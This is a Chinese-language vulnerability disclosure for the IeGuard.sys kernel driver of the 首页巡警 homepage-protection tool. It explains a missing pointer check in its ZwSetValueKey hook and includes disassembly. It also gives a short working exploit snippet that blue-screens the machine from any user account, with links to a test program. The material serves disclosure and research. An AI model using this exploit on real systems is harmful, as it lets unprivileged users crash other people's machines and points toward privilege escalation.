首页巡警v1.1/1.0的内核驱动程序存在严重漏洞
安装了首页巡警v1.1(v1.0)的机器,任意权限的用户可导致系统蓝屏(BSOD),造成拒绝服务攻击
结合我之前公布的SystemCrashDumpInformation加载驱动方式,可以在安装了HIPS的机器上造成本地提权漏洞,即任意权限的用户可以加载驱动到内核并执行。
出问题的函数是IeGuard.sys!HkZwSetValueKey
该函数的第三个参数是PUNICODE_STRING ValueName
IeGuard没有对参数做任何检查就使用RtlCompareUnicodeString函数对该值进行判断,只要在RING3对此参数置0,IeGuard将立即导致系统蓝屏
相关汇编代码:
.text:00011430 HkZwSetValueKey proc near ; DATA XREF: HookKeyRoutine+52 o
.text:00011430 ; sub_11B66+45 o
.text:00011430
.text:00011430 StartPageUniName= UNICODE_STRING ptr -14h
.text:00011430 var_C = dword ptr -0Ch
.text:00011430 Object = dword ptr -8
.text:00011430 isPass = byte ptr -1
.text:00011430 Handle = dword ptr 8
.text:00011430 ValueName = dword ptr 0Ch
.text:00011430 arg_8 = dword ptr 10h
.text:00011430 arg_C = dword ptr 14h
.text:00011430 arg_10 = dword ptr 18h
.text:00011430 arg_14 = dword ptr 1Ch
.text:00011430
.text:00011430 mov edi, edi
.text:00011432 push ebp
.text:00011433 mov ebp, esp
.text:00011435 sub esp, 14h
.text:00011438 push ebx
.text:00011439 xor ebx, ebx
.text:0001143B mov [ebp+isPass], bl
.text:0001143E call ds:ExGetPreviousMode
.text:00011444 cmp al, 1
.text:00011446 jnz loc_114FA
.text:00011446
.text:0001144C push offset str_StartPage ; SourceString
.text:00011451 lea eax, [ebp+StartPageUniName]
.text:00011454 push eax ; DestinationString
.text:00011455 call ds:RtlInitUnicodeString
.text:0001145B push 1 ; CaseInSensitive
.text:0001145D push [ebp+ValueName] ; String2
.text:00011460 lea eax, [ebp+StartPageUniName]
.text:00011463 push eax ; String1
.text:00011464 call ds:RtlCompareUnicodeString
<---此处未做任何判断就将ValueName传递给RtlCompareUnicodeString
导致蓝屏
.text:0001146A test eax, eax
.text:0001146C jnz loc_114FA
利用代码(该代码运行后即可导致安装了首页巡警的机器立即蓝屏,可在任意用户权限下执行)
HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwSetValueKey");
__asm
{
push 0
push 0
push 0
push 0
push 0
push 0
call p
}
测试程序下载:
http://www.debugman.com/read.php?tid=1330
或:
http://mj0011.ys168.com/ 漏洞演示\IeGuardLeakTest.rar